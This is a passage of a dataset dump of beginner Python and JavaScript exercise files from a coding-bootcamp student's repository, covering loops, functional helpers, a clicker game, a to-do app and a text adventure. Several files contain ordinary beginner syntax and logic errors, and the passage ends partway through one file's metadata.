"length_bytes": 213,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 21,
"path": "/week-7/tuesday/while.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a = 0;\n\nwhile (a <= 10) {\n console.log(a++);\n if (a === 4) {\n break\n }\n}\n\n\n\n\nvar array = [\"kacsa\", \"malac\", \"cica\"]\nvar j = 0;\n\nwhile (j < array.length) {\n console.log(array[j]);\n j++\n}\n"
},
{
"alpha_fraction": 0.5393586158752441,
"alphanum_fraction": 0.6064140200614929,
"avg_line_length": 25.384614944458008,
"blob_id": "d17d8cc910185f821bad626e354e9564b6571f85",
"content_id": "605f81697f450ab510f7718dbffda2e588a465ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/week-5/wednesday/funct1_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nimport func1\n\nclass TestFunc(unittest.TestCase):\n def test_apply_function(self):\n array = [1, 2, 3,]\n self.assertEqual(func1.adder(array), [2, 3, 4])\n\n def test_filter_array(self):\n array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n self.assertEqual(func1.filterArray(array), [0,3,6,9])\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5080645084381104,
"avg_line_length": 23.799999237060547,
"blob_id": "1c989ae2156c2d4fe369bc9f3bcdd61e725d85e1",
"content_id": "9f65ed0057386c89439c59da2d189a388f26e056",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/week-3/wednesday/count.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_string):\n self.string = my_string\n\n def count_string(self, char):\n count = 0\n for i in self.greet:\n if char == i\n count =+1\n return count\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6293706297874451,
"avg_line_length": 22.66666603088379,
"blob_id": "0be115b307ddb92293d146196579a36dab45398c",
"content_id": "9c0a63177b30e7143170f549271a8f692df7b6d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 6,
"path": "/week-5/wednesday/func1.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\ndef adder(array):\n return list(map(lambda x : x+1, array))\n\n\ndef filterArray(array):\n return list(filter(lambda x : x % 3 == 0, array))\n"
},
{
"alpha_fraction": 0.5907173156738281,
"alphanum_fraction": 0.594936728477478,
"avg_line_length": 22.700000762939453,
"blob_id": "4bad2c6271a8ff158f86ac129282845ed2402a42",
"content_id": "f20e417635baef9bc60da00498e02b941698a90e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/week-4/practice/38.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "names = [\"Zakarias\", \"Hans\", \"Otto\", \"Ole\"]\n\ndef shortest_name(my_name):\n output = my_name[0]\n for string in my_name:\n if len(output) > len(string):\n output = string\n return output\n\nprint(shortest_name(names))\n"
},
{
"alpha_fraction": 0.5628140568733215,
"alphanum_fraction": 0.5979899764060974,
"avg_line_length": 8.949999809265137,
"blob_id": "43696204ca976d3be327d481c30e861ba97760ff",
"content_id": "69a700d8a35f12e63f1cbeaa689d161278670874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 20,
"path": "/week-7/tuesday/scope.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar a = 123;\n\nfunction printA() {\n console.log(a);\n a = 523;\n}\n\nprintA();\nconsole.log(a);\n\n\nfunction printLocalA() {\n var a = 9;\n console.log(a);\n}\n\nprintLocalA();\nconsole.log(a);\n"
},
{
"alpha_fraction": 0.44111350178718567,
"alphanum_fraction": 0.4860813617706299,
"avg_line_length": 15.678571701049805,
"blob_id": "3dde170c7651ff048ae005c1a621f5613b327dd5",
"content_id": "a3a92a7e2a7412a77336c646ebbbca47b9f5ed82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 467,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 28,
"path": "/week-4/practice/car.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "lada = {\n \"color\": \"red\",\n \"type\": \"spaceX\",\n \"km\": \"1200km\"\n}\n\n\ntesla = {\n \"color\": \"blue\",\n \"type\": \"Tesla S\",\n \"km\": \"100km\"\n}\ndef initCar(color, type, km)\n car = (\"color\": \"\", \"type\", \"\", \"km\": 0)\n car[ \"color\" ] = color\n car[ \"type\" ] = type\n car[ \"km\" ] = km\n return car\n\n\ndef ride(car, km):\n car[ \"km\"] == km\n\nlada = initCar (\"red\", \"Lada 200\", 200)\ntesla = initCar (\"blue\", \"Xspam\", 2500)\n\nride(tesla, 220)\nprint(tesla)\n"
},
{
"alpha_fraction": 0.6812400817871094,
"alphanum_fraction": 0.6987281441688538,
"avg_line_length": 20.32203483581543,
"blob_id": "19ca350dede16bce3dc06c025a5f64053621d310",
"content_id": "0693666e3737ba7028d3f9dd74442cfe2191acfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1258,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 59,
"path": "/week-8/tuesday/candies/candies.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar createCandie = document.querySelector(\".candiebutton\");\nvar buyLollipop = document.querySelector(\".lollibutton\");\nvar currentCandy = 500;\nvar currentLolli = 0;\nvar timecount = 0;\n\nfunction updateCandies() {\n document.querySelector(\".candies\").innerHTML=(\"Your candies: \" + currentCandy);\n};\n\nfunction updateLollies() {\n document.querySelector(\".lollipops\").innerHTML=(\"Your lollipops: \" + currentLolli);\n};\n\nfunction updateCount() {\n document.querySelector(\".candiespersec\").innerHTML=(\"Candy/Second: \" + timecount);\n};\n\nfunction addCandie() {\n currentCandy++;\n updateCandies();\n if(currentCandy >= 10000) {\n alert(\"YoU aRe tHe WiNnEeEr!\");\n restartGame();\n }\n};\n\nfunction buyLolli() {\n if (currentCandy >= 10) {\n currentCandy -= 10;\n currentLolli++;\n updateLollies();\n updateCandies();\n }\n};\n\nfunction restartGame() {\n currentCandy = 0;\n currentLolli = 0;\n updateLollies();\n updateCandies();\n};\n\nfunction increasespeed() {\n timecount = Math.floor(currentLolli / 10)\n currentCandy += timecount;\n updateCandies();\n updateCount();\n};\n\nfunction setSpeed() {\nsetInterval(increasespeed, 1000);\n};\n\ncreateCandie.addEventListener(\"click\", addCandie);\nbuyLollipop.addEventListener(\"click\", buyLolli);\nsetSpeed();\n"
},
{
"alpha_fraction": 0.6677820086479187,
"alphanum_fraction": 0.6711280941963196,
"avg_line_length": 24.204818725585938,
"blob_id": "db5138c5a6bfbd2bd08ca37db24842311318d7c5",
"content_id": "f38c003c8750fbf3a905a071bc82bf05800d6e43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2092,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 83,
"path": "/week-8/project_todo/public/heraku.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nvar url = 'https://mysterious-dusk-8248.herokuapp.com/todos';\nvar listItem = document.querySelector(\"ul\");\nvar newItemInput = document.querySelector('.item-input');\nvar addNewItemInput = document.querySelector('.addnewitem');\nvar deleteButton = document.querySelector('.deletebutton');\n\n\nlistItems(updateHtml);\n\n\nfunction startRequest(text) {\n postItemToServer(text, textDOM)\n}\n\nfunction listItems(callback) {\n var req = new XMLHttpRequest();\n req.open('GET', url);\n req.send();\n req.onreadystatechange = function () {\n if (req.readyState === 4) {\n var res = JSON.parse(req.response);\n return callback(res);\n }\n };\n}\n\nfunction postItemToServer(text, callback) {\n var req = new XMLHttpRequest();\n req.open('POST', url);\n req.setRequestHeader('Content-Type', 'application/json');\n req.send(JSON.stringify({\"text\": text}));\n req.onreadystatechange = function () {\n if (req.readyState === 4) {\n var res = JSON.parse(req.response);\n return callback(res);\n }\n };\n}\n\nfunction deleteItem(id, callback) {\n var req = new XMLHttpRequest();\n req.open('DELETE', url + '/' + id);\n req.send();\n req.onreadystatechange = function () {\n if (req.readyState === 4) {\n var res = JSON.parse(req.response);\n return callback(res);\n }\n }\n};\n\nfunction deleteCallBack(res) {\n document.getElementById(res.id).remove();\n}\n\n\ndeleteButton.addEventListener(\"click\", function() {\n deleteItem(addNewItemInput.value, deleteCallBack);\n});\n\nfunction updateHtml(res) {\n res.forEach(function(item) {\n if (item.text !== \"\") {\n var newitem = document.createElement(\"li\");\n newitem.innerText = item.id + ' ' + item.text;\n newitem.setAttribute(\"id\", item.id)\n listItem.appendChild(newitem);\n }\n })\n};\n\nfunction textDOM(response) {\n var output = document.querySelector(\"li\");\n output.innerText = response.id + \" \" + response.text;\n output.setAttribute(\"id\", response.text)\n document.body.appendChild(output)\n};\n\naddNewItemInput.addEventListener('click', function () {\n postItemToServer(newItemInput.value, textDOM);\n});\n"
},
{
"alpha_fraction": 0.4585365951061249,
"alphanum_fraction": 0.4707317054271698,
"avg_line_length": 18.5238094329834,
"blob_id": "8d4e293aff076a48bfd92a716ad6b1d4f5739f14",
"content_id": "df8402e413c7e0ed27380cb31087f5bf6a5a57e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 21,
"path": "/week-5/tuesday/fibo.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Fibo:\n def __init__(self, current):\n self.count = count\n self.a = 0\n self.b = 1\n self.i = 0\n\n def __next__(self):\n if self.i == self.count:\n return StopIteration()\n\n self.i += 1\n curr = self.a\n self.a, self.b = self.a + self.b, self.a\n return curr\n\n def __iter__(self):\n return self\n\nfor n in Fibo(5)\n print(n)\n"
},
{
"alpha_fraction": 0.5403726696968079,
"alphanum_fraction": 0.5776397585868835,
"avg_line_length": 15.100000381469727,
"blob_id": "3a18cdcf47872329c0aae08ec208aee3c61f9017",
"content_id": "3e464fa80e00d8b796382b1fc7d4defa983e9c42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 10,
"path": "/week-4/practice/33.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [4, 5, 6, 7, 8]\n\ndef list(my_list):\n output = 0\n for i in my_list:\n output += i\n return output\n\nnumbers = list(numbers)\nprint(numbers)\n"
},
{
"alpha_fraction": 0.550869345664978,
"alphanum_fraction": 0.5599154233932495,
"avg_line_length": 33.88524627685547,
"blob_id": "6b79b331e617dce30f05f81d4165a057890ebcc0",
"content_id": "adc510cf0b52d11e9e839068fe5fb4d841002bed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8512,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 244,
"path": "/week-6/project/menu.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "from random import randint\n\nclass MenuItem():\n def __init__(self, num, name, action):\n self.num = num\n self.name = name\n self.action = action\n\nclass Menu():\n def __init__(self, items):\n self.items = items\n\n def choose(self, number):\n for item in self.items:\n if item.num == number:\n return item.action()\n\n def printMenu(self):\n for item in self.items:\n print(item.num, item.name)\n\n def user_input(self):\n user_input = int(input(\"Choose your faith! \" + \"\\n\"))\n print('\\033c')\n try:\n if user_input == \"\" or user_input > len(menu.items):\n raise ValueError\n except:\n print(\"Hey, that\\'s not an option!\")\n return user_input\n\n def print_and_choose_menu_input(self):\n self.printMenu()\n self.choose(self.user_input())\n\nclass Character():\n def __init__(self, name = None, dexterity = 0, hp = 0, luck = 0, potion = None):\n self.name = name\n self.dexterity = dexterity\n self.hp = hp\n self.luck = luck\n self.potion = potion\n\n def input_name(self):\n print('\\033c')\n self.name = input(\"Tell me your name, young hero! \" + \"\\n\")\n return self.name\n\n def dexterity_rollstat(self):\n self.dexterity = randint(1, 6) + 6\n return(print(\"dexterity points: \" , self.dexterity))\n\n def health_rollstat(self):\n self.hp = randint(2, 12) + 12\n return(print(\"health points: \" , self.hp))\n\n def luck_rollstat(self):\n self.luck = randint(1, 6) + 6\n return(print(\"luck points: \" , self.luck, \"\\n\"))\n\n def roll_dex_hp_luck_stats(self):\n text = input(\"Press Enter to roll the dice for the basic stats (dexterity, hp, luck)! \" + \"\\n\")\n self.dexterity_rollstat()\n self.health_rollstat()\n self.luck_rollstat()\n roll_stats()\n\n def choose_potion(self, potion):\n potion_menu(potion)\n\n def print_character_stat(self):\n print(self.name + \" \" + \"stats: \" + \"\\n\")\n print(\"Dexterity points: \", self.dexterity)\n print(\"Health points: \", self.hp)\n print(\"Luck points: \", self.luck)\n\nclass Opponent():\n def __init__(self, name = \"Sanyi\", hp = 0, dexterity = 0):\n self.name = name\n self.hp = hp\n self.dexterity = dexterity\n\n def opp_dexterity_rollstat(self):\n self.dexterity = randint(1, 6)\n return(\"dexterity points: \" , self.dexterity)\n\n def opp_health_rollstat(self):\n self.hp = randint(2, 12)\n return(\"health points: \" , self.hp)\n\n def print_opp_stat(self):\n self.opp_dexterity_rollstat()\n self.opp_health_rollstat()\n print(self.name + \" \" + \"stats: \" + \"\\n\")\n print(\"Dexterity points: \", self.dexterity)\n print(\"Health points: \", self.hp)\n\n def print_opp_and_char_stats(self):\n print(\"Test your Sword in a test fight! \" + \"\\n\")\n print(new_player.print_character_stat(), \"\\n\")\n print(self.print_opp_stat(), \"\\n\")\n strike_menu()\n\nclass Fight():\n def __init__(self, character_strike = None, opponent_strike = None):\n self.character_strike = character_strike\n self.opponent_strike = opponent_strike\n\n def current_dex(self):\n strike_dex_char = randint(2, 12)\n strike_dex_opp = randint(2, 12)\n self.character_strike = (new_player.dexterity + strike_dex_char)\n self.opponent_strike = (enemy.dexterity + strike_dex_opp)\n print(new_player.name, \"dexterity during the strike\" , self.character_strike)\n print(enemy.name, \"dexterity during the strike\" , self.opponent_strike, \"\\n\")\n\n def after_strike(self):\n if self.character_strike > self.opponent_strike:\n enemy.hp -= 2\n print(\"OMG, you hit the f*cking MONSTER!!\" , \"\\n\" , \"It has only\" , enemy.hp , \"hp points left\")\n else:\n new_player.hp -= 2\n print(\"Sorry buddy, the f*cking Monster hit you!\"\"\\n\" , \"You have\" , new_player.hp , \"hp points left\")\n\n def is_alive(self):\n if new_player.hp <= 0:\n print(\"You\\'re dead. I think this whole hero stuff is not your thing...Or you can start again and try not to be a bitch!\")\n elif enemy.hp <= 0:\n print(\"YOU\\'VE JUST KILLED THE BEAST! F*cking amazing! I think your job is done here.\")\n else:\n pass\n\n def strike(self):\n self.current_dex()\n self.after_strike()\n print(\"\\n\")\n self.is_alive()\n after_strike_menu()\n\n def try_luck(self):\n random_luck = randint(2, 12)\n if new_player.luck < random_luck and self.character_strike < self.opponent_strike:\n new_player.hp -= 3\n print(\"You have no luck, you have lost 3 healt points\")\n strike_menu()\n elif new_player.luck >= random_luck and self.character_strike < self.opponent_strike:\n new_player.hp -= 1\n new_player.luck -= 1\n print(\"You are lucky\")\n strike_menu()\n elif new_player.luck < random_luck and self.character_strike > self.opponent_strike:\n new_player.hp -= 1\n print(\"You have no luck\")\n strike_menu()\n elif new_player.luck >= random_luck and self.character_strike > self.opponent_strike:\n new_player.hp -= 4\n new_player.luck -= 1\n print(\"This is luck!\")\n strike_menu()\n\ndef exit_game():\n pass\n\ndef after_strike_menu():\n after_strike_menu = Menu([\n MenuItem(1, \"Continue\", fight.strike),\n MenuItem(2, \"Try your luck\", fight.try_luck),\n MenuItem(3, \"Retreat\", None),\n MenuItem(4, \"Quit\", quit_game)\n ])\n after_strike_menu.print_and_choose_menu_input()\n\ndef strike_menu():\n strike_menu = Menu([\n MenuItem(1, \"Strike\", fight.strike),\n MenuItem(2, \"Retreat\", None),\n MenuItem(3, \"Quit\", quit_game)\n ])\n strike_menu.print_and_choose_menu_input()\n\ndef begin_game_menu():\n begin_game_menu = Menu([\n MenuItem(1, \"Begin\", enemy.print_opp_and_char_stats),\n MenuItem(2, \"Save\", None),\n MenuItem(3, \"Quit\", quit_game)\n ])\n new_player.print_character_stat()\n begin_game_menu.print_and_choose_menu_input()\n\ndef potion_chooser():\n potions = Menu([\n MenuItem(1, \"Potion of Health\", lambda: new_player.choose_potion(\"Potion of Health\")),\n MenuItem(2, \"Potion of Dexterity\", lambda: new_player.choose_potion(\"Potion of Dexterity\")),\n MenuItem(3, \"Potion of Luck\", lambda: new_player.choose_potion(\"Potion of Luck\"))\n ])\n potions.print_and_choose_menu_input()\n\ndef potion_menu(potion):\n print(\"Your selected potion is: \" + potion + \"\\n\")\n potion_menu = Menu([\n MenuItem(1, \"Reselect the Potion\", potion_chooser),\n MenuItem(2, \"Continue\", begin_game_menu),\n MenuItem(3, \"Quit\", quit_game)\n ])\n potion_menu.print_and_choose_menu_input()\n\ndef roll_stats():\n roll_stats_menu_items = Menu([\n MenuItem(1, \"Re-roll stats\", new_player.roll_dex_hp_luck_stats),\n MenuItem(2, \"Continue\", potion_chooser),\n MenuItem(3, \"Save\", None),\n MenuItem(4, \"Quit\", quit_game)\n ])\n roll_stats_menu_items.print_and_choose_menu_input()\n\ndef quit_game():\n quit_game_menu_items = Menu([\n MenuItem(1, \"Save and Quit\", exit_game),\n MenuItem(2, \"Quit without save\", exit_game),\n MenuItem(3, \"Resume\", new_game_action)\n ])\n quit_game_menu_items.print_and_choose_menu_input()\n\ndef new_game_action():\n new_game_name_items = Menu([\n MenuItem(1, \"Re-enter name\", new_player.input_name),\n MenuItem(2, \"Continue\", new_player.roll_dex_hp_luck_stats),\n MenuItem(3, \"Save\", None),\n MenuItem(4, \"Quit\", quit_game)\n ])\n new_player.input_name()\n new_game_name_items.print_and_choose_menu_input()\n\nmenu_items = [\n MenuItem(1, 'New Game', new_game_action),\n MenuItem(2, 'Load Game', None),\n MenuItem(3, 'Exit Game', quit_game)\n ]\n\nmenu = Menu(menu_items)\nnew_player = Character()\nenemy = Opponent()\nfight = Fight()\nmenu.print_and_choose_menu_input()\n"
},
{
"alpha_fraction": 0.5765982866287231,
"alphanum_fraction": 0.5874547362327576,
"avg_line_length": 19.725000381469727,
"blob_id": "434a76a3742b0a701b19200c90815f0088c0bbf5",
"content_id": "44783a3bfedbd42b00dd8faa46a0f66f6ad58b78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 829,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 40,
"path": "/week-5/tuesday/observer.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Warrior:\n def __init__(self):\n self.companions = []\n self.hp = 100\n\n def join(self, companion):\n self.companion.append(companion)\n\n def strike(self, opponent):\n opponent.inflict_damage(10)\n\n def inflict_damage(self, damage):\n self.hp -= damage\n for companion in self.companion:\n companion.notify(\"damage\", self)\n\n def heal(self):\n self.hp = hp\n\n def cursed(self, opponent):\n opponent.join(Cursed())\n\nclass Healer:\n def __notify__(self, type, warrior):\n if type == \"damage\":\n warrior.heal(10)\n\nclass Cursed:\n def __notify__(self, type, warrior):\n if type == \"cursed\"\n warrior.heal(-10)\n\nrabbit = Warrior()\nwolf = Warrior()\nshaman = Healer()\n\nrabbit.join(shaman)\n\nwolf.strike(rabbit)\nprint(rabbit, hp)\n"
},
{
"alpha_fraction": 0.48399999737739563,
"alphanum_fraction": 0.4880000054836273,
"avg_line_length": 22.700000762939453,
"blob_id": "c1bb651a6ffcc7392872bea0e4efaf9eff8187f2",
"content_id": "08d35323712b59d5aa3cf6c8eeb1f47b5e5f590f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/week-3/wednesday/list.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_string):\n self.string = my_string\n\n def average(self):\n summ = 0\n for i in self.string:\n summ = summ + i\n summ = summ / x\n return summ\n \n"
},
{
"alpha_fraction": 0.546875,
"alphanum_fraction": 0.5703125,
"avg_line_length": 14.058823585510254,
"blob_id": "493c23d45f6c6b81b6218b7300f6e9e7f3f586bc",
"content_id": "15a0d1cdb410fbf1e64f438849ff0f646d9ec588",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/week-7/wednesday/factory.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction createCar(color, type, km) {\n return {\n color: color,\n type: type,\n km: km,\n ride: function(km) {\n this.km += km;\n }\n }\n}\n\nvar lambo = createCar(\"sarga\", \"asffv\", 500);\nlambo.ride(100);\n\nconsole.log(lambo.km);\n"
},
{
"alpha_fraction": 0.5541528463363647,
"alphanum_fraction": 0.5634551644325256,
"avg_line_length": 22.153846740722656,
"blob_id": "3a7426dc103bd4ca534ce222175228e793826498",
"content_id": "18aac678efd7e5e59bd0b564e8be3200dd63b703",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1505,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 65,
"path": "/week-4/project/todo_app.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import os\n\nfilename = \"list.txt\"\n\ndef list_items():\n text = open(\"list.txt\", \"r\").readlines()\n for index, line in enumerate(text):\n print(index +1, line)\n todo_menu()\n\n\ndef todo_menu():\n print(\"1. Current list\" + \"\\n\" + \"2. Add item\" + \"\\n\" + \"3. Remove item\" + \"\\n\" + \"4. Move item to Complete direntory\" + \"\\n\" + \"5. EXIT\" + \"\\n\")\n chooser = int(input(\"Choose an action! \"))\n if chooser == 1:\n list_items()\n elif chooser == 2:\n add_item()\n elif chooser == 3:\n remove_item()\n elif chooser == 4:\n move_item()\n elif chooser == 5:\n pass\n else:\n print(\"You can not choose that!\")\n\n\ndef add_item():\n text = open(\"list.txt\", \"a\")\n new_item = input(\"Give me a new TODO! \")\n text.write(new_item + \"\\n\")\n text.close()\n todo_menu()\n\ndef remove_item():\n text = open(\"list.txt\", \"r\").readlines()\n remove_item = int(input(\"What would you like to delete? \"))\n text_write = open(\"list.txt\", \"w\")\n del text[remove_item -1]\n for line in text:\n text_write.write(line)\n text_write.close()\n return todo_menu()\n\ndef move_item():\n text = open(\"list.txt\", \"r\").readlines()\n move_item = int(input( \"Which TODO is complete? \"))\n completed_item = open(\"completed.txt\", \"w\")\n completed_item.write(text[move_item - 1])\n text_write = open(\"list.txt\", \"w\")\n del text[move_item -1]\n for line in text:\n text_write.write(line)\n text_write.close()\n return todo_menu()\n\n\n\n\n\n\n\n\ntodo_menu()\n"
},
{
"alpha_fraction": 0.5524475574493408,
"alphanum_fraction": 0.5769230723381042,
"avg_line_length": 20.185184478759766,
"blob_id": "2fd5d3140745cbbf5555afb435e9742cc61da8d0",
"content_id": "f82d505ef0679bd1d42ba51fb4da2eb345dc815d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 27,
"path": "/week-4/practice/dictionary.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "student = {\"labmeret\": 45, \"nev\": \"tibike\", \"kor\": 8.5}\nprint(student[\"labmeret\"])\n\n\nstudents = [\n {\"name\": \"tibi\", \"age\": 6},\n {\"name\": \"adorjan\", \"age\": 9},\n {\"name\": \"aurel\", \"age\": 7},\n {\"name\": \"dezso\", \"age\": 12}\n]\n\nstudents_at_least_8 = []\n\nfor student in students:\n if student[ \"age\"] > 8:\n students_at_least_8.append(student[\"name\"])\n\n\nprint(students_at_least_8)\n\n\nstudents_name_starts_a = []\n\nfor student in students:\n if student[ \"name\" ][0] == \"a\":\n students_name_starts_a.append(student[ \"name\"])\nprint(students_name_starts_a)\n"
},
{
"alpha_fraction": 0.47911548614501953,
"alphanum_fraction": 0.5184274911880493,
"avg_line_length": 13.034482955932617,
"blob_id": "abc23082a8fdf320cc38f3d79a013dd3b6c7e1f3",
"content_id": "595be5f0cf01d267ba854295bbdf72f6630c781e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 407,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 29,
"path": "/week-4/practice/34.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "# 3 = 1 * 2* 3\n\ndef fact(numbers):\n output = 1\n i = 1\n while i <= numbers:\n output *= i\n i += 1\n return output\n\nprint(fact(6))\n\n\ndef fact(numbers):\n output = 1\n for i in range(1, numbers + 1):\n output *= i\n return output\n\nprint(fact(6))\n\n\ndef fact(numbers):\n if numbers == 1:\n return 1\n else:\n return fact(numbers - 1) * numbers\n\nprint(fact(6))\n"
},
{
"alpha_fraction": 0.5317073464393616,
"alphanum_fraction": 0.5512195229530334,
"avg_line_length": 12.666666984558105,
"blob_id": "27c7becfd42b59be1e0f926ba81945d74b5a8d19",
"content_id": "db24a9cc00debb0830a3c969d65925a6c2e0a40e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 15,
"path": "/week-3/tuesday/practice.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def greet(name):\n return \"Hello, \" + name\n\nresult = greet (\"Dorka\")\nprint(result)\n\ng = []\ndef add (a, b):\n res = a + b\n g.append(res)\n return res\n\nprint (add(1, 2))\nprint (add(8, 4))\nprint (g)\n"
},
{
"alpha_fraction": 0.630630612373352,
"alphanum_fraction": 0.6756756901741028,
"avg_line_length": 12.875,
"blob_id": "052b7a84a3ecb7a76c02359229d860c92a14efb5",
"content_id": "90ea087a1afb365e0d9ef27c74c6094864b1bbd6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 111,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/week-8/tuesday/workshop/timeout.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar timeout = setTimeout(function() {\n console.log(\"Yaay\");\n}, 10000);\n\n\nclearTimeout(timeout);\n"
},
{
"alpha_fraction": 0.6627451181411743,
"alphanum_fraction": 0.6627451181411743,
"avg_line_length": 14.9375,
"blob_id": "0583d6503edb1822affe5112d4db140d30aa3a03",
"content_id": "d58db8e051574981cb0d01a5f1f538db796cfdb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 16,
"path": "/week-8/thursday/read.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar fs = require(\"fs\");\n\n\nfunction readAppleTxt(callback) {\n fs.readFile(\"apple.txt\", function(error, content) {\n var output= String(content);\n callback(output);\n });\n};\n\n\nreadAppleTxt(function(content) {\n console.log(content);\n});\n"
},
{
"alpha_fraction": 0.6141906976699829,
"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 14.033333778381348,
"blob_id": "d3f2802ac2bb260c55559c2624a8e913851fe03d",
"content_id": "83a9a891b8c14fe04083438c14ffbecc76bd710b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 30,
"path": "/week-7/wednesday/map.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\n//1.\nvar benaszavak = [\"kuty\",\n\"macsk\",\n\"alm\",\n\"gabon\"];\n\nvar faszaszavak = [];\n\nfor (var i = 0; i < benaszavak.length; i++) {\n faszaszavak.push(benaszavak[i] + \"a\");\n};\nconsole.log(faszaszavak);\n\n//2.\nvar faszaszavak2 = [];\n\nbenaszavak.forEach(function (szo) {\n faszaszavak2.push(szo + \"a\");\n});\n\nconsole.log(faszaszavak2);\n\n//3.\nvar faszaszavak3 = benaszavak.map(function (szo) {\n return szo + \"a\";\n});\n\nconsole.log(faszaszavak3);\n"
},
{
"alpha_fraction": 0.5866666436195374,
"alphanum_fraction": 0.6066666841506958,
"avg_line_length": 21.5,
"blob_id": "a72ed642fff04acb1e48f127ca98e09da00f9c2f",
"content_id": "a67d872126ffb581b2c48c88c79bc5fe5f7d5370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 20,
"path": "/week-7/wednesday/kids.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
